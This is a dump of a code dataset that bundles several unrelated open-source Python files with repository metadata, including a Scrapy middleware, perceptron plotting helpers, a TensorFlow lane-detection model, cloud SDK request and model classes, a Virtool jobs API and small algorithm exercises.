dbpath = os.path.join(self.dir, '%s.db' % spider.name)
reset = self.reset or getattr(spider, 'deltafetch_reset', False)
flag = self.dbmodule.DB_TRUNCATE if reset else self.dbmodule.DB_CREATE
try:
self.db = self.dbmodule.DB()
self.db.open(filename=dbpath,
dbtype=self.dbmodule.DB_HASH,
flags=flag)
except Exception:
logger.critical("Failed to open DeltaFetch database at %s, "
"trying to recreate it" % dbpath)
if os.path.exists(dbpath):
os.remove(dbpath)
self.db = self.dbmodule.DB()
self.db.open(filename=dbpath,
dbtype=self.dbmodule.DB_HASH,
flags=self.dbmodule.DB_CREATE)
def spider_closed(self, spider):
self.db.close()
def process_spider_output(self, response, result, spider):
for r in result:
if isinstance(r, Request):
key = self._get_key(r)
if self.db.has_key(key):
self.logger.info("Ignoring already visited: %s" % r)
continue
elif isinstance(r, BaseItem):
key = self._get_key(response.request)
self.db[key] = str(time.time())
yield r
def _get_key(self, request):
return request.meta.get('deltafetch_key') or request_fingerprint(request)
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
b10177e34d37112453bda54ad58806a828ae33b8 | b0807e3ad7af88ffd3152c7fc5315604f553f8fc | /perceptron/perceptron.py | 7ab3b594c5df700d4fc76047f5a6939c77a4813e | [] | no_license | jhamrick/sigcse-2016-slides | f34bfbb93b851efca574a0a2da0d4182c64b979a | 44d3fab1c6dea14c00272a7ad7b43703fff7d4d2 | refs/heads/master | 2021-01-10T09:04:20.777687 | 2016-03-04T15:10:58 | 2016-03-04T15:10:58 | 53,106,715 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,586 | py | import numpy as np
import matplotlib.pyplot as plt
def gen_data(m):
"""Generate m random data points from each of two diferent normal
distributions with unit variance, for a total of 2*m points.
Parameters
----------
m : int
Number of points per class
Returns
-------
x, y : numpy arrays
x is a float array with shape (m, 2)
y is a binary array with shape (m,)
"""
sigma = np.eye(2)
mu = np.array([[0, 2], [0, 0]])
mvrandn = np.random.multivariate_normal
x = np.concatenate([mvrandn(mu[:, 0], sigma, m), mvrandn(mu[:, 1], sigma, m)], axis=0)
y = np.concatenate([np.zeros(m), np.ones(m)], axis=0)
idx = np.arange(2 * m)
np.random.shuffle(idx)
x = x[idx]
y = y[idx]
return x, y
def set_limits(axis, x):
"""Set the axis limits, based on the min and max of the points.
Parameters
----------
axis : matplotlib axis object
x : array with shape (m, 2)
"""
axis.set_xlim(x[:, 0].min() - 0.5, x[:, 0].max() + 0.5)
axis.set_ylim(x[:, 1].min() - 0.5, x[:, 1].max() + 0.5)
def init_plot(x, y, boundary, loops):
"""Initialize the plot with two subplots: one for the training
error, and one for the decision boundary. Returns a function
that can be called with new errors and boundary to update the
plot.
Parameters
----------
x : numpy array with shape (m, 2)
The input data points
y : numpy array with shape (m,)
The true labels of the data
boundary : numpy array with shape (2, 2)
Essentially, [[xmin, ymin], [xmax, ymax]]
Returns
-------
update_plot : function
This function takes two arguments, the array of errors and
the boundary, and updates the error plot with the new errors
and the boundary on the data plot.
"""
plt.close('all')
fig, (ax1, ax2) = plt.subplots(1, 2)
error_line, = ax1.plot([0], [0], 'k-')
ax1.set_xlim(0, (loops * y.size) - 1)
ax1.set_ylim(0, 15)
ax1.set_xlabel("Iteration")
ax1.set_ylabel("Training error")
colors = np.empty((y.size, 3))
colors[y == 0] = [0, 0, 1]
colors[y == 1] = [1, 0, 0]
ax2.scatter(x[:, 0], x[:, 1], c=colors, s=25)
normal_line, = ax2.plot(boundary[0, 0], boundary[0, 1], 'k-', linewidth=1.5)
set_limits(ax2, x)
plt.draw()
plt.show()
def update_plot(errors, boundary):
error_line.set_xdata(np.arange(errors.size))
error_line.set_ydata(errors)
normal_line.set_xdata(boundary[:, 0])
normal_line.set_ydata(boundary[:, 1])
set_limits(ax2, x)
fig.canvas.draw()
return update_plot
def calc_normal(normal, weights):
"""Calculate the normal vector and decision boundary.
Parameters
----------
normal : numpy array with shape (2,)
The normal vector to the decision boundary
weights : numpy array with shape (3,)
Weights of the perceptron
Returns
-------
new_normal, boundary : numpy arrays
The new_normal array is the updated normal vector. The
boundary array is [[xmin, ymin], [xmax, ymax]] of the
boundary between the points.
"""
new_normal = normal - (np.dot(weights[:2], normal) / np.dot(weights[:2], weights[:2])) * weights[:2]
new_normal = new_normal / np.dot(new_normal, new_normal)
offset = -weights[2] * weights[:2] / np.dot(weights[:2], weights[:2])
normmult = np.array([-1000, 1000])
boundary = (new_normal[None] * normmult[:, None]) + offset[None]
return new_normal, boundary
| [
"jhamrick@berkeley.edu"
] | jhamrick@berkeley.edu |
dff5734cf3ac7ce60a11c12aaff326812956ba5c | afd11dfdfb07880d0dfe9593662753741627f39d | /lane_detection_cnn.py | e0fba6f2252c1221e1b09386661af826b2762d30 | [] | no_license | nghiatdprt/Lane-Detection-Basic | a12aeabae838c54912e67d95cf20fddecef6374d | c1449bf1d3539658f851fd996b2df74c0fdcbd5c | refs/heads/master | 2020-03-28T16:10:51.485929 | 2018-09-13T16:42:42 | 2018-09-13T16:42:42 | 148,667,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,101 | py | import tensorflow as tf
import numpy as np
import logging
import toulouse_dataset
import cv2
model_params = {
'input_shape': (320, 50, 3),
'batch_size': 100
}
hyper_params = {
'learning_rate': 0.01,
'drop_out': 0.25
}
tf.logging.set_verbosity(tf.logging.INFO)
def conv2d_fn(input_tensor, k_size, n_out):
return tf.layers.conv2d(inputs= input_tensor, \
filters= n_out, \
kernel_size= k_size, \
activation= tf.nn.relu, \
use_bias= True)
def maxpool2d_fn(input_tensor, p_size, strides):
return tf.layers.max_pooling2d(inputs= input_tensor, pool_size= p_size, strides= strides)
def model_fn(features, labels, mode):
features_tensor = tf.cast(features, tf.float32, name="input_tensor")
net = conv2d_fn(features_tensor, 3, 32)
net = maxpool2d_fn(net, 2, 2)
net = conv2d_fn(features_tensor, 3, 64)
net = maxpool2d_fn(net, 2, 2)
net = tf.layers.flatten(net)
# net = tf.layers.dense(inputs= features_tensor, units= 512, activation=tf.nn.relu)
# net = tf.layers.dense(inputs= net, units= 256)
out_put = tf.layers.dense(inputs= net, units= 2, name="out_put")
prediction = {
'coordinate' : tf.cast(out_put, tf.int32)
}
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode = mode, predictions = prediction)
labels = tf.cast(labels, tf.int32)
loss = tf.losses.mean_squared_error(labels= labels, predictions= out_put)
tf.summary.scalar('loss', loss)
if mode == tf.estimator.ModeKeys.TRAIN:
optimizer = tf.train.AdamOptimizer(learning_rate= hyper_params['learning_rate'])
train_op = optimizer.minimize(loss = loss, global_step= tf.train.get_global_step())
return tf.estimator.EstimatorSpec(mode = mode, loss = loss, train_op = train_op)
rmse = tf.metrics.root_mean_squared_error(labels, prediction['coordinate'])
# Add the rmse to the collection of evaluation metrics.
eval_metrics = {"rmse": rmse}
return tf.estimator.EstimatorSpec(
mode=mode,
# Report sum of error for compatibility with pre-made estimators
loss=loss,
eval_metric_ops=eval_metrics)
def preprocess_data(img_list, width= 320, height=50):
# image = cv2.resize(image, (width, height), interpolation=cv2.INTER_LINEAR)
res = img_list
# create a big 1D-array
# for img in img_list:
# # img = cv2.resize(img, (width, height), interpolation=cv2.INTER_LINEAR)
# # img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# # mask_white = cv2.inRange(img, 140, 255)
# res.append(cv2.resize(img, (int(width/2), int(height/2))))
# res = np.array(res)
# data_shape = res.shape
# res = np.reshape(res, [data_shape[0], data_shape[1], data_shape[2], -1])
# print(res.shape)
# Normalize
res = res / 255. # values in [0, 1]
res -= 0.5 # values in [-0.5, 0.5]
res *= 2 # values in [-1, 1]
return res
# x_train, y_train, x_test, y_test = toulouse_dataset.load_toulouse_dataset()
# x_train = preprocess_data(x_train)
# x_test = preprocess_data(x_test)
model_classifier = tf.estimator.Estimator(
model_fn = model_fn, \
model_dir= 'CheckPoint2')
# print(model_classifier)
# train_input_fn = tf.estimator.inputs.numpy_input_fn(
# x = x_train,
# y = y_train,
# num_epochs= None,
# batch_size= model_params['batch_size'],
# shuffle= True)
# model_classifier.train(
# input_fn = train_input_fn,\
# steps= 2000)
# eval_input_fn = tf.estimator.inputs.numpy_input_fn(
# x = x_train,
# y = y_train,
# num_epochs= 1,
# shuffle= False)
# eval_result = model_classifier.evaluate(input_fn = eval_input_fn)
# print(eval_result)
def serving_input_receiver_fn():
inputs = tf.placeholder(dtype = tf.float32, shape=[None, 50, 320, 3])
return tf.estimator.export.TensorServingInputReceiver(inputs, inputs)
model_classifier.export_savedmodel(export_dir_base="model", serving_input_receiver_fn= serving_input_receiver_fn)
| [
"nghiatd.proptit@gmail.com"
] | nghiatd.proptit@gmail.com |
6605c15fbea3b939cbdb337a3ca2ab161f3d6946 | d786da05888e4154456e14caa52b10ea5075c65d | /aliyun-python-sdk-waf-openapi/aliyunsdkwaf_openapi/request/v20190910/DescribeProtectBlockSummaryRequest.py | 03b19268e6418f6bfd57ce08fb13c3f1390f40c0 | [
"Apache-2.0"
] | permissive | yuerl/aliyun-openapi-python-sdk | c95d35712d21d42c5f9eec1d255375d3d11bd63b | 205ab3f0ed32c61c382d7383659e42f3e5300e7b | refs/heads/master | 2022-07-03T02:27:44.550641 | 2020-05-12T03:27:46 | 2020-05-12T03:27:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,561 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkwaf_openapi.endpoint import endpoint_data
class DescribeProtectBlockSummaryRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'waf-openapi', '2019-09-10', 'DescribeProtectBlockSummary','waf')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_StartTimestamp(self):
return self.get_query_params().get('StartTimestamp')
def set_StartTimestamp(self,StartTimestamp):
self.add_query_param('StartTimestamp',StartTimestamp)
def get_EndTimestamp(self):
return self.get_query_params().get('EndTimestamp')
def set_EndTimestamp(self,EndTimestamp):
self.add_query_param('EndTimestamp',EndTimestamp)
def get_SourceIp(self):
return self.get_query_params().get('SourceIp')
def set_SourceIp(self,SourceIp):
self.add_query_param('SourceIp',SourceIp)
def get_Lang(self):
return self.get_query_params().get('Lang')
def set_Lang(self,Lang):
self.add_query_param('Lang',Lang)
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId)
def get_Domain(self):
return self.get_query_params().get('Domain')
def set_Domain(self,Domain):
self.add_query_param('Domain',Domain)
def get_Step(self):
return self.get_query_params().get('Step')
def set_Step(self,Step):
self.add_query_param('Step',Step)
def get_Region(self):
return self.get_query_params().get('Region')
def set_Region(self,Region):
self.add_query_param('Region',Region) | [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
d4f548f887979fe662fa1a6fae964c21b6ec91cc | 7773ea6f465ffecfd4f9821aad56ee1eab90d97a | /python/helpers/typeshed/stdlib/3/faulthandler.pyi | afd739462fc964f6a9a603b810193f2fd07831dd | [
"Apache-2.0",
"MIT"
] | permissive | aghasyedbilal/intellij-community | 5fa14a8bb62a037c0d2764fb172e8109a3db471f | fa602b2874ea4eb59442f9937b952dcb55910b6e | refs/heads/master | 2023-04-10T20:55:27.988445 | 2020-05-03T22:00:26 | 2020-05-03T22:26:23 | 261,074,802 | 2 | 0 | Apache-2.0 | 2020-05-04T03:48:36 | 2020-05-04T03:48:35 | null | UTF-8 | Python | false | false | 685 | pyi | import io
import sys
from typing import Union, Protocol
from _types import FileDescriptorLike
def cancel_dump_traceback_later() -> None: ...
def disable() -> None: ...
def dump_traceback(file: FileDescriptorLike = ..., all_threads: bool = ...) -> None: ...
def dump_traceback_later(timeout: float, repeat: bool = ..., file: FileDescriptorLike = ..., exit: bool = ...) -> None: ...
def enable(file: FileDescriptorLike = ..., all_threads: bool = ...) -> None: ...
def is_enabled() -> bool: ...
if sys.platform != "win32":
def register(signum: int, file: FileDescriptorLike = ..., all_threads: bool = ..., chain: bool = ...) -> None: ...
def unregister(signum: int) -> None: ...
| [
"intellij-monorepo-bot-no-reply@jetbrains.com"
] | intellij-monorepo-bot-no-reply@jetbrains.com |
bb6938b5b08f304d80dd221b6c19dcf8965a7305 | 2b54b1fb1540ab73d6c83cae3acd5fdd58bdead5 | /Vanadium_cluster_project/anatase_TiO2_101surface_used/V2O5_TiO2_101_zorderimageplot_3by1supercell.py | 971ec963ae899a6b55cf92ebb34b23675e957e46 | [] | no_license | sivachiriki/GOFEE_Pt_V_supported | 5787d44294262870075f35f2d31c096021b7ce20 | 6bd700dac1f3e7c58394b758d75246ac6e07eade | refs/heads/master | 2022-04-08T11:38:13.038455 | 2020-03-09T10:48:31 | 2020-03-09T10:48:31 | 226,359,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,932 | py | from __future__ import division
import matplotlib
#matplotlib.use('Agg') # Can also use 'tkagg' or 'webagg'
#from plot_neb_tio2 import *
from matplotlib.offsetbox import TextArea, VPacker, AnnotationBbox
import matplotlib.patches as patches
import matplotlib.pyplot as plt
from ase.io import read, write
from ase.visualize import view
import matplotlib.patches as mpatches
from ase.data.colors import jmol_colors
from pylab import *
from ase.data import covalent_radii as aradii
from matplotlib.patches import Circle
from math import atan2,pi
import matplotlib.gridspec as gridspec
matplotlib.rcParams['xtick.direction'] = 'out'
matplotlib.rcParams['ytick.direction'] = 'out'
matplotlib.rc('font',**{'family':'sans-serif',
'sans-serif':['Helvetica'],
'size':14})
matplotlib.rc('text',usetex=True)
matplotlib.rcParams['text.latex.unicode']=True
#matplotlib.rcParams['text.latex.preamble']=['\usepackage{bm}']
#matplotlib.rcParams['text.latex.preamble']=['\usepackage{xfrac}']
matplotlib.rcParams['mathtext.default'] = 'regular'
matplotlib.rcParams['ps.usedistiller'] = 'xpdf'
matplotlib.rc('xtick', labelsize=14)
matplotlib.rc('ytick', labelsize=14)
def plot_atoms(ax, atoms, xyz, acols, alp, z):
ecols = [[0, 0, 0] for col in atoms]
indices = range(len(atoms))
for ia in indices:
acol = acols[ia]
ecol = ecols[ia]
if atoms[ia].symbol == 'Ti':
arad = aradii[atoms[ia].number] #* 0.9 * 0.5
else:
arad = aradii[atoms[ia].number] #* 0.9
apos = atoms[ia].position
eps = arad
circ = Circle([apos[xyz[0]], apos[xyz[1]]],
fc = acol,
ec = ecol,
radius = arad,
lw = 0.5,
alpha = alp[ia],
zorder = 1 - apos[1]/1000
)
ax.add_patch(circ)
def plot_conf(ax, atoms, rot=False):
colors = np.array([jmol_colors[atom.number] for atom in atoms])
for i, atom in enumerate(atoms):
if (atom.number ==23):
colors[i] =[76/255, 153/255, 0/255]
if (atom.number ==8 and i >= 648):
colors[i] =[153/255, 0/255, 0/255]
if (atom.number ==1):
colors[i] =[255/255, 255/255, 255/255]
alp = [None] * colors.shape[0]
for i,a in enumerate(atoms):
if a.symbol == 'Ti' or a.symbol == 'O':
if a.position[2] < 13.50:
alp[i] = 0.6
if rot:
atoms.rotate('x',pi/2)
plot_atoms(ax, atoms, [0,2,1], colors, alp, z=-1)
data=read('anataseTi24O48_101surface_optPBEesben_1by3.traj@:')
for j in range(len(data)):
image = data[j]
#for i,a in enumerate(image):
# if a.position[1] >15.180:
# image.positions[i,1] =0.000
#image = image * (2,2,1)
# Make array of indices for atoms that should be repeated in x and y directions
plt.figure(figsize=(4.0,6.0))
gs = gridspec.GridSpec(2, 1,
height_ratios=[6.32,7.18])
cell = image.get_cell()
# 0 0
ax = plt.subplot(gs[0, 0])
img = image.copy()
plot_conf(ax, img)
print(cell[0,0])
print(cell[1,1])
ax.set_xlim([-1.0, 10.70])
ax.set_ylim([5.50, 16.50])
ax.set_yticks([])
ax.set_xticks([])
ax.set(aspect=1)
# 0 1
ax = plt.subplot(gs[1, 0])
img = image.copy()
plot_conf(ax, img, rot=True)
ax.set_xlim([-1.0, 10.7])
ax.set_ylim([-1.50, 11.0])
ax.set_yticks([])
ax.set_xticks([])
ax.set(aspect=1)
gs.update(wspace=0.00,hspace=0.00)
plt.tight_layout()
name ='TiO2_101sur_3by1supercell.png'
savefig(name,bbox_inches='tight')
plt.show()
| [
"sivachiriki@phys.au.dk"
] | sivachiriki@phys.au.dk |
b7518824fc43b6c989902289a1fef325022b1247 | 1bde114a847c629701e3acd004be5788594e0ef1 | /Examples/Py4Prog/different_returns.py | 1a92b3a3f7f74d4fb0490267fad9e52e0ae4e56b | [] | no_license | BruceEckel/ThinkingInPython | 0b234cad088ee144bb8511e1e7db9fd5bba78877 | 76a1310deaa51e02e9f83ab74520b8269aac6fff | refs/heads/master | 2022-02-21T23:01:40.544505 | 2022-02-08T22:26:52 | 2022-02-08T22:26:52 | 97,673,620 | 106 | 33 | null | 2022-02-08T22:26:53 | 2017-07-19T04:43:50 | Python | UTF-8 | Python | false | false | 200 | py | # Py4Prog/different_returns.py
def different_returns(arg):
if arg == 1:
return "one"
if arg == "one":
return True
print(different_returns(1))
print(different_returns("one"))
| [
"mindviewinc@gmail.com"
] | mindviewinc@gmail.com |
959d294c8eca3319541da2fd16288d2149cf7a73 | 61c6f707403307bbf124f85689d0008c5fef7462 | /removeElements.py | 949269ae5a03d3f3af57c0ab3e5c55db9ef21a01 | [] | no_license | immzz/leetcode_solutions | 1685bb82abccbcb7e8869e6df61d79241d66d17b | baddc09a5e626d919011aa222667a40e2ef4c375 | refs/heads/master | 2016-09-06T06:44:56.971046 | 2015-10-06T01:35:39 | 2015-10-06T01:35:39 | 23,483,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 933 | py | class Solution:
# @param {integer[]} nums
# @param {integer} val
# @return {integer}
def removeElement(self, nums, val):
if (not nums) or len(nums) < 1:
return 0
length = len(nums)
val_ptr = 0
current_ptr = 0
while (val_ptr < len(nums)) and (current_ptr < len(nums)):
while (val_ptr < len(nums)) and (not (nums[val_ptr] == val)):
val_ptr += 1
current_ptr = val_ptr + 1
while (current_ptr < len(nums)) and (nums[current_ptr] == val):
current_ptr += 1
if (current_ptr < len(nums)) and (val_ptr < len(nums)):
temp = nums[current_ptr]
nums[current_ptr] = nums[val_ptr]
nums[val_ptr] = temp
val_ptr += 1
current_ptr += 1
return val_ptr
sol = Solution()
a = [2,3,3]
print sol.removeElement(a,2)
print a | [
"zeostudio@gmail.com"
] | zeostudio@gmail.com |
5fba49f6abf7fd870f403d743c941edc418ac119 | 350db570521d3fc43f07df645addb9d6e648c17e | /1439_Find_the_Kth_Smallest_Sum_of_a_Matrix_With_Sorted_Rows/solution.py | 410bee6160c17cc3dcfb17136fda39f7cf4af231 | [] | no_license | benjaminhuanghuang/ben-leetcode | 2efcc9185459a1dd881c6e2ded96c42c5715560a | a2cd0dc5e098080df87c4fb57d16877d21ca47a3 | refs/heads/master | 2022-12-10T02:30:06.744566 | 2022-11-27T04:06:52 | 2022-11-27T04:06:52 | 236,252,145 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | '''
1439. Find the Kth Smallest Sum of a Matrix With Sorted Rows
Level: Hard
https://leetcode.com/problems/find-the-kth-smallest-sum-of-a-matrix-with-sorted-rows
'''
'''
Solution:
'''
class Solution:
def kthSmallest(self, mat: List[List[int]], k: int) -> int:
| [
"benjaminhuanghuang@gmail.com"
] | benjaminhuanghuang@gmail.com |
4eac8110cbbd1dda68c1f2fefbb625f8e9167722 | 6fa0d5d3b61fbce01fad5a7dd50258c09298ee00 | /Algorithm/BOJ/2754.py | 57138e66826228ebad25635ac3866d1e5de91457 | [] | no_license | athletejuan/TIL | c8e6bd9f7e2c6f999dbac759adcdb6b2959de384 | 16b854928af2f27d91ba140ebc1aec0007e5eb04 | refs/heads/master | 2023-02-19T13:59:06.495110 | 2022-03-23T15:08:04 | 2022-03-23T15:08:04 | 188,750,527 | 1 | 0 | null | 2023-02-15T22:54:50 | 2019-05-27T01:27:09 | Python | UTF-8 | Python | false | false | 181 | py | C = input()
credit = {'A+': 4.3, 'A0': 4.0, 'A-': 3.7, 'B+': 3.3, 'B0': 3.0, 'B-': 2.7, 'C+': 2.3, 'C0': 2.0, 'C-': 1.7, 'D+': 1.3, 'D0': 1.0, 'D-': 0.7, 'F': 0.0}
print(credit[C]) | [
"vanillasky84.0627@gmail.com"
] | vanillasky84.0627@gmail.com |
446e368dfaaedf1674c3ed268346ea05f820c598 | b662fcc29eda65211bccef35fbe42f5a072986c5 | /pysm/transformation/models/scope.py | 06d7849413eb18afa2962a0377db2e4826224b1d | [
"MIT"
] | permissive | binh-vu/semantic-modeling | 08edb87ed36724046049e1caf10a6cb3da69ccaf | b387584502ba1daa6abd6b7573828416f6426b49 | refs/heads/master | 2022-01-09T10:24:08.840566 | 2019-05-11T06:09:30 | 2019-05-11T06:09:30 | 186,094,653 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,359 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from typing import Dict, Tuple, List, Set, Union, Optional
from transformation.models.table_schema import Schema
class Scope:
def __init__(self, path: str):
self.path = path
if path == "":
self.attr_paths = []
else:
self.attr_paths = path.split(Schema.PATH_DELIMITER)
def is_outer_scope_of(self, scope: 'Scope') -> bool:
return scope.path.startswith(self.path) and scope.path != self.path
def is_same_scope(self, scope: 'Scope') -> bool:
return scope.path == self.path
def get_parent(self):
return Scope(Schema.PATH_DELIMITER.join(self.attr_paths[:-1]))
def get_inner_scope(self):
assert len(self.attr_paths) > 0
return Scope(Schema.PATH_DELIMITER.join(self.attr_paths[1:]))
def contain_path(self, path: str):
return path.startswith(self.path)
def get_relative_path(self, path: str):
if self.path == "":
return path
return path[len(self.path)+1:]
def get_relative_path2scope(self, scope: 'Scope'):
"""Return a relative path to another scope"""
return scope.attr_paths[len(self.attr_paths):]
def extract_data(self, global_row: dict):
if self.path == "":
return global_row
return _extract_data(self.attr_paths, global_row)
def __eq__(self, other):
if other is None or not isinstance(other, Scope):
return False
return self.path == other.path
def __lt__(self, other):
if other is None or not isinstance(other, Scope):
raise NotImplementedError()
return other.path.startswith(self.path) and other.path != self.path
def __gt__(self, other):
if other is None or not isinstance(other, Scope):
raise NotImplementedError()
return self.path.startswith(other.path) and other.path != self.path
def __repr__(self):
return self.path
def _extract_data(attr_paths: List[str], local_row: dict):
attr = attr_paths[0]
if len(attr_paths) == 1:
return local_row[attr]
for attr in attr_paths:
if isinstance(local_row[attr], list):
return [_extract_data(attr_paths[1:], val) for val in local_row[attr]]
return _extract_data(attr_paths[1:], local_row[attr])
| [
"binh@toan2.com"
] | binh@toan2.com |
97f4d4bf6bbeea91ac82ddf267e8c6fc3e00e32a | 4fe68a329da64dceef27b4f62dcde538e07ea3e0 | /109.py | b697c5c7fc08aa9c5037fc713f60c654bad6da5a | [] | no_license | LiuXPeng/leetcode | 9bf18a8c86952e12d8ca2032793d2abfe918a730 | 1d583df4089e1678996f481fa1a903b22ff43182 | refs/heads/master | 2020-03-20T00:52:01.736500 | 2018-07-26T03:25:04 | 2018-07-26T03:25:04 | 137,058,642 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 966 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def sortedListToBST(self, head):
"""
:type head: ListNode
:rtype: TreeNode
"""
if not head:
return
tag = head
count = 1 #让count多一个
while tag:
tag = tag.next
count += 1
if count == 2:
return TreeNode(head.val)
if count == 3:
res = TreeNode(head.next.val)
res.left = TreeNode(head.val)
return res
k = count // 2
tag = head
for i in range(0, k - 2):
tag = tag.next
temp = tag.next
res = TreeNode(temp.val)
tag.next = None
res.left = self.sortedListToBST(head)
res.right = self.sortedListToBST(temp.next)
return res | [
"LiuXPeng@users.noreply.github.com"
] | LiuXPeng@users.noreply.github.com |
c05c576d43957856efff8eecd62f30a51faddc53 | 3b1053ea38fee9a59d335dd75bb6a6906d298594 | /virtool/jobs/api.py | 0167f78f13fd311dd71976150a0e196319ee992b | [
"MIT"
] | permissive | tianshengsui/virtool | 8c59bb36c7e2924586be34fabc6b861e16691b7d | eb75637eb6ca9dcba647ad8acad5d316877dd55e | refs/heads/master | 2023-04-19T16:36:54.894894 | 2021-04-23T19:09:33 | 2021-04-23T19:09:33 | 295,793,679 | 0 | 0 | MIT | 2020-09-30T23:53:54 | 2020-09-15T16:55:59 | null | UTF-8 | Python | false | false | 3,295 | py | import os
import virtool.api.utils
import virtool.http.routes
import virtool.jobs.db
import virtool.resources
import virtool.users.db
import virtool.utils
from virtool.api.response import conflict, json_response, no_content, not_found
routes = virtool.http.routes.Routes()
@routes.get("/api/jobs")
async def find(req):
"""
Return a list of job documents.
"""
db = req.app["db"]
term = req.query.get("find")
db_query = dict()
if term:
db_query.update(virtool.api.utils.compose_regex_query(term, ["task", "user.id"]))
data = await virtool.api.utils.paginate(
db.jobs,
db_query,
req.query,
projection=virtool.jobs.db.PROJECTION
)
data["documents"].sort(key=lambda d: d["created_at"])
return json_response(data)
@routes.get("/api/jobs/{job_id}")
async def get(req):
"""
Return the complete document for a given job.
"""
job_id = req.match_info["job_id"]
document = await req.app["db"].jobs.find_one(job_id)
if not document:
return not_found()
return json_response(virtool.utils.base_processor(document))
@routes.put("/api/jobs/{job_id}/cancel", permission="cancel_job")
async def cancel(req):
"""
Cancel a job.
"""
db = req.app["db"]
job_id = req.match_info["job_id"]
document = await db.jobs.find_one(job_id, ["status"])
if not document:
return not_found()
if not virtool.jobs.is_running_or_waiting(document):
return conflict("Not cancellable")
await req.app["jobs"].cancel(job_id)
document = await db.jobs.find_one(job_id)
return json_response(virtool.utils.base_processor(document))
@routes.delete("/api/jobs", permission="remove_job")
async def clear(req):
db = req.app["db"]
job_filter = req.query.get("filter")
# Remove jobs that completed successfully.
complete = job_filter in [None, "finished", "complete"]
# Remove jobs that errored or were cancelled.
failed = job_filter in [None, "finished", "failed"]
removed = await virtool.jobs.db.clear(db, complete=complete, failed=failed)
return json_response({
"removed": removed
})
@routes.delete("/api/jobs/{job_id}", permission="remove_job")
async def remove(req):
"""
Remove a job.
"""
db = req.app["db"]
job_id = req.match_info["job_id"]
document = await db.jobs.find_one(job_id)
if not document:
return not_found()
if virtool.jobs.is_running_or_waiting(document):
return conflict("Job is running or waiting and cannot be removed")
# Removed the documents associated with the job ids from the database.
await db.jobs.delete_one({"_id": job_id})
try:
# Calculate the log path and remove the log file. If it exists, return True.
path = os.path.join(req.app["settings"]["data_path"], "logs", "jobs", job_id + ".log")
await req.app["run_in_thread"](virtool.utils.rm, path)
except OSError:
pass
return no_content()
@routes.get("/api/resources")
async def get_resources(req):
"""
Get a object describing compute resource usage on the server.
"""
resources = virtool.resources.get()
req.app["resources"].update(resources)
return json_response(resources)
| [
"igboyes@gmail.com"
] | igboyes@gmail.com |
0a55920724eb79f070f95f641c0239ee7ab5f1e2 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-iotanalytics/huaweicloudsdkiotanalytics/v1/model/raw_value.py | c8334c0dd5a90195b94e73878d1c4f0eef47f204 | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 3,922 | py | # coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class RawValue:
    """Generated huaweicloud SDK model for a raw asset-property value series.

    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Attribute names whose values are masked as "****" by to_dict().
    sensitive_list = []
    # Attribute name -> declared OpenAPI type (used by to_dict() to walk fields).
    openapi_types = {
        'property_name': 'str',
        'values': 'list[object]'
    }
    # Attribute name -> JSON key in the wire format (identical here).
    attribute_map = {
        'property_name': 'property_name',
        'values': 'values'
    }
    def __init__(self, property_name=None, values=None):
        """RawValue

        The model defined in huaweicloud sdk

        :param property_name: Property name
        :type property_name: str
        :param values: Sequence of historical values of the asset property, e.g. [1,2]
        :type values: list[object]
        """
        self._property_name = None
        self._values = None
        self.discriminator = None
        # Only assign through the property setters when a value was supplied,
        # so unset attributes stay None.
        if property_name is not None:
            self.property_name = property_name
        if values is not None:
            self.values = values
    @property
    def property_name(self):
        """Gets the property_name of this RawValue.

        Property name

        :return: The property_name of this RawValue.
        :rtype: str
        """
        return self._property_name
    @property_name.setter
    def property_name(self, property_name):
        """Sets the property_name of this RawValue.

        Property name

        :param property_name: The property_name of this RawValue.
        :type property_name: str
        """
        self._property_name = property_name
    @property
    def values(self):
        """Gets the values of this RawValue.

        Sequence of historical values of the asset property, e.g. [1,2]

        :return: The values of this RawValue.
        :rtype: list[object]
        """
        return self._values
    @values.setter
    def values(self, values):
        """Sets the values of this RawValue.

